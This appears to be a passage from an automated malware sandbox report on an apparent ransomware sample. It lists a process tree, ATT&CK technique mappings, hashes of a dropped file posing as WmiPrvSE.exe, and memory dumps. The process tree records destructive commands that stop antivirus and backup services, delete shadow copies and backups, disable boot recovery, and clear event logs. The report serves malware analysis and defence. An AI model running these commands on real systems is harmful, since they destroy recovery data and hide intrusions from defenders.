    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop bedbg /y
        5⤵
        
        PID:1616
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop ekrn /y
    3⤵
    PID:364
  - - C:\Windows\SysWOW64\net.exe
      net stop ekrn /y
      4⤵
      PID:1136
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop ekrn /y
        5⤵
        
        PID:1148
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop kavfsslp /y
    3⤵
    PID:1908
  - - C:\Windows\SysWOW64\net.exe
      net stop kavfsslp /y
      4⤵
      PID:1848
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop kavfsslp /y
        5⤵
        
        PID:1692
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop klnagent /y
    3⤵
    PID:2040
  - - C:\Windows\SysWOW64\net.exe
      net stop klnagent /y
      4⤵
      PID:1704
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop klnagent /y
        5⤵
        
        PID:2044
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop macmnsvc /y
    3⤵
    PID:1192
  - - C:\Windows\SysWOW64\net.exe
      net stop macmnsvc /y
      4⤵
      PID:1276
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop macmnsvc /y
        5⤵
        
        PID:1672
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop masvc /y
    3⤵
    PID:1536
  - - C:\Windows\SysWOW64\net.exe
      net stop masvc /y
      4⤵
      PID:856
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop masvc /y
        5⤵
        
        PID:1980
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop mfefire /y
    3⤵
    PID:1592
  - - C:\Windows\SysWOW64\net.exe
      net stop mfefire /y
      4⤵
      PID:240
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop mfefire /y
        5⤵
        
        PID:616
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop mfemms /y
    3⤵
    PID:872
  - - C:\Windows\SysWOW64\net.exe
      net stop mfemms /y
      4⤵
      PID:1496
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop mfemms /y
        5⤵
        
        PID:1464
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop mfevtp /y
    3⤵
    PID:2024
  - - C:\Windows\SysWOW64\net.exe
      net stop mfevtp /y
      4⤵
      PID:1488
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop mfevtp /y
        5⤵
        
        PID:1988
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop mozyprobackup /y
    3⤵
    PID:1768
  - - C:\Windows\SysWOW64\net.exe
      net stop mozyprobackup /y
      4⤵
      PID:756
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop mozyprobackup /y
        5⤵
        
        PID:1244
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop msftesql$PROD /y
    3⤵
    PID:1140
  - - C:\Windows\SysWOW64\net.exe
      net stop msftesql$PROD /y
      4⤵
      PID:1032
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop msftesql$PROD /y
        5⤵
        
        PID:984
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop ntrtscan /y
    3⤵
    PID:1436
  - - C:\Windows\SysWOW64\net.exe
      net stop ntrtscan /y
      4⤵
      PID:1964
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop ntrtscan /y
        5⤵
        
        PID:1028
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop sacsvr /y
    3⤵
    PID:1340
  - - C:\Windows\SysWOW64\net.exe
      net stop sacsvr /y
      4⤵
      PID:1376
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop sacsvr /y
        5⤵
        
        PID:2028
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop sophossps /y
    3⤵
    PID:1172
  - - C:\Windows\SysWOW64\net.exe
      net stop sophossps /y
      4⤵
      PID:1564
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop sophossps /y
        5⤵
        
        PID:364
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop svcGenericHost /y
    3⤵
    PID:1612
  - - C:\Windows\SysWOW64\net.exe
      net stop svcGenericHost /y
      4⤵
      PID:1728
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop svcGenericHost /y
        5⤵
        
        PID:1908
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop swi_filter /y
    3⤵
    PID:840
  - - C:\Windows\SysWOW64\net.exe
      net stop swi_filter /y
      4⤵
      PID:772
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop swi_filter /y
        5⤵
        
        PID:2040
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop swi_service /y
    3⤵
    PID:2000
  - - C:\Windows\SysWOW64\net.exe
      net stop swi_service /y
      4⤵
      PID:472
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop swi_service /y
        5⤵
        
        PID:1192
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop swi_update /y
    3⤵
    PID:752
  - - C:\Windows\SysWOW64\net.exe
      net stop swi_update /y
      4⤵
      PID:1576
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop swi_update /y
        5⤵
        
        PID:1536
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop swi_update_64 /y
    3⤵
    PID:280
  - - C:\Windows\SysWOW64\net.exe
      net stop swi_update_64 /y
      4⤵
      PID:432
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop swi_update_64 /y
        5⤵
        
        PID:1592
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop tmlisten /y
    3⤵
    PID:836
  - - C:\Windows\SysWOW64\net.exe
      net stop tmlisten /y
      4⤵
      PID:688
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop tmlisten /y
        5⤵
        
        PID:872
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop wbengine /y
    3⤵
    PID:1912
  - - C:\Windows\SysWOW64\net.exe
      net stop wbengine /y
      4⤵
      PID:1736
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop wbengine /y
        5⤵
        
        PID:2024
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop wbengine /y
    3⤵
    PID:556
  - - C:\Windows\SysWOW64\net.exe
      net stop wbengine /y
      4⤵
      PID:568
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop wbengine /y
        5⤵
        
        PID:1768
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    PID:980
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
    3⤵
    PID:1512
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
    3⤵
    PID:800
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C wbadmin delete systemstatebackup
    3⤵
    PID:2028
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C wbadmin delete systemstatebackup -keepversions:0
    3⤵
    PID:1184
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C wbadmin delete backup
    3⤵
    PID:1564
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
    3⤵
    PID:1692
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic shadowcopy delete
      4⤵
      PID:1848
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
    3⤵
    PID:1684
  - - C:\Windows\SysWOW64\vssadmin.exe
      vssadmin delete shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:896
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
    3⤵
    PID:1440
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
      4⤵
      PID:268
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
    3⤵
    PID:2024
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
      4⤵
      PID:1488
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
    3⤵
    PID:1244
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
      4⤵
      PID:1324
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C attrib "%userprofile%\documents\Default.rdp" -s -h
    3⤵
    PID:1424
  - - C:\Windows\SysWOW64\attrib.exe
      attrib "C:\Users\Admin\documents\Default.rdp" -s -h
      4⤵
      Views/modifies file attributes
      PID:1196
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C del "%userprofile%\documents\Default.rdp"
    3⤵
    PID:980
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C wevtutil.exe clear-log Application
    3⤵
    PID:1512
  - - C:\Windows\SysWOW64\wevtutil.exe
      wevtutil.exe clear-log Application
      4⤵
      Clears Windows event logs
      Suspicious use of AdjustPrivilegeToken
      PID:800
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C wevtutil.exe clear-log Security
    3⤵
    PID:1480
  - - C:\Windows\SysWOW64\wevtutil.exe
      wevtutil.exe clear-log Security
      4⤵
      Clears Windows event logs
      Suspicious use of AdjustPrivilegeToken
      PID:576
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C wevtutil.exe clear-log System
    3⤵
    PID:1184
  - - C:\Windows\SysWOW64\wevtutil.exe
      wevtutil.exe clear-log System
      4⤵
      Clears Windows event logs
      Suspicious use of AdjustPrivilegeToken
      PID:1564
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C sc config eventlog start=disabled
    3⤵
    PID:1644
  - - C:\Windows\SysWOW64\sc.exe
      sc config eventlog start=disabled
      4⤵
      Launches sc.exe
      PID:1836
- C:\Windows\SysWOW64\notepad.exe
  notepad.exe
  2⤵
  - Deletes itself
  PID:1112

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1600

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File Deletion

T1107

Hidden Files and Directories

T1158

Indicator Removal on Host

T1070

Install Root Certificate

T1130

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0O8D7KIM\JCJ1NNQ6.htm

Filesize
184B

MD5
b1cd7c031debba3a5c77b39b6791c1a7

SHA1
e5d91e14e9c685b06f00e550d9e189deb2075f76

SHA256
57ba053f075e0b80f747f3102ed985687c16a8754d109e7c4d33633269a36aaa

SHA512
d2bbefdc1effb52a38964c4cec5990a5a226248eca36f99e446c0c5704436f666bf1cb514e73b8991411d497d3325ecc646cbd5065c364e92ab6b9c5f1ad4a72

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\WmiPrvSE.exe

Filesize
477KB

MD5
a1b5dc4fd2cd2b54498faf42fe9b5e50

SHA1
46edeab30fe0696422edad230116c51d5b145aa3

SHA256
533e14cb3a1434f68321fb9fd2a2e66d0a12ce16f792ee47e77edf8eb2aeac21

SHA512
6316f72a06960def5f9f086b4a258adf8dad7396524597fa23f2b781b87418b1009b5b8f7a67e90406739e2bdf3db873254ace84b64c6b569bda8c0435821848

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\WmiPrvSE.exe

Filesize
477KB

MD5
a1b5dc4fd2cd2b54498faf42fe9b5e50

SHA1
46edeab30fe0696422edad230116c51d5b145aa3

SHA256
533e14cb3a1434f68321fb9fd2a2e66d0a12ce16f792ee47e77edf8eb2aeac21

SHA512
6316f72a06960def5f9f086b4a258adf8dad7396524597fa23f2b781b87418b1009b5b8f7a67e90406739e2bdf3db873254ace84b64c6b569bda8c0435821848

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\WmiPrvSE.exe

Filesize
477KB

MD5
a1b5dc4fd2cd2b54498faf42fe9b5e50

SHA1
46edeab30fe0696422edad230116c51d5b145aa3

SHA256
533e14cb3a1434f68321fb9fd2a2e66d0a12ce16f792ee47e77edf8eb2aeac21

SHA512
6316f72a06960def5f9f086b4a258adf8dad7396524597fa23f2b781b87418b1009b5b8f7a67e90406739e2bdf3db873254ace84b64c6b569bda8c0435821848

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Windows\WmiPrvSE.exe

Filesize
477KB

MD5
a1b5dc4fd2cd2b54498faf42fe9b5e50

SHA1
46edeab30fe0696422edad230116c51d5b145aa3

SHA256
533e14cb3a1434f68321fb9fd2a2e66d0a12ce16f792ee47e77edf8eb2aeac21

SHA512
6316f72a06960def5f9f086b4a258adf8dad7396524597fa23f2b781b87418b1009b5b8f7a67e90406739e2bdf3db873254ace84b64c6b569bda8c0435821848

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Windows\WmiPrvSE.exe

Filesize
477KB

MD5
a1b5dc4fd2cd2b54498faf42fe9b5e50

SHA1
46edeab30fe0696422edad230116c51d5b145aa3

SHA256
533e14cb3a1434f68321fb9fd2a2e66d0a12ce16f792ee47e77edf8eb2aeac21

SHA512
6316f72a06960def5f9f086b4a258adf8dad7396524597fa23f2b781b87418b1009b5b8f7a67e90406739e2bdf3db873254ace84b64c6b569bda8c0435821848

Download Submit
memory/524-66-0x0000000000400000-0x0000000000579000-memory.dmp

Filesize
1.5MB

Download
memory/524-71-0x0000000000400000-0x0000000000579000-memory.dmp

Filesize
1.5MB

Download
memory/524-72-0x0000000001EF0000-0x0000000002066000-memory.dmp

Filesize
1.5MB

Download
memory/812-95-0x0000000001E50000-0x0000000001FC6000-memory.dmp

Filesize
1.5MB

Download
memory/812-143-0x0000000000400000-0x0000000000579000-memory.dmp

Filesize
1.5MB

Download
memory/812-142-0x0000000001E50000-0x0000000001FC6000-memory.dmp

Filesize
1.5MB

Download
memory/812-141-0x0000000000400000-0x0000000000579000-memory.dmp

Filesize
1.5MB

Download
memory/812-93-0x0000000000400000-0x0000000000579000-memory.dmp

Filesize
1.5MB

Download
memory/812-121-0x0000000000400000-0x0000000000579000-memory.dmp

Filesize
1.5MB

Download
memory/872-65-0x0000000003A60000-0x0000000003BD9000-memory.dmp

Filesize
1.5MB

Download
memory/872-55-0x0000000002070000-0x00000000021E6000-memory.dmp

Filesize
1.5MB

Download
memory/872-64-0x0000000003A60000-0x0000000003BD9000-memory.dmp

Filesize
1.5MB

Download
memory/872-56-0x0000000075521000-0x0000000075523000-memory.dmp

Filesize
8KB

Download
memory/872-57-0x0000000000400000-0x0000000000579000-memory.dmp

Filesize
1.5MB

Download
memory/872-54-0x0000000000400000-0x0000000000579000-memory.dmp

Filesize
1.5MB

Download
memory/872-68-0x0000000002070000-0x00000000021E6000-memory.dmp

Filesize
1.5MB

Download
memory/872-67-0x0000000000400000-0x0000000000579000-memory.dmp

Filesize
1.5MB

Download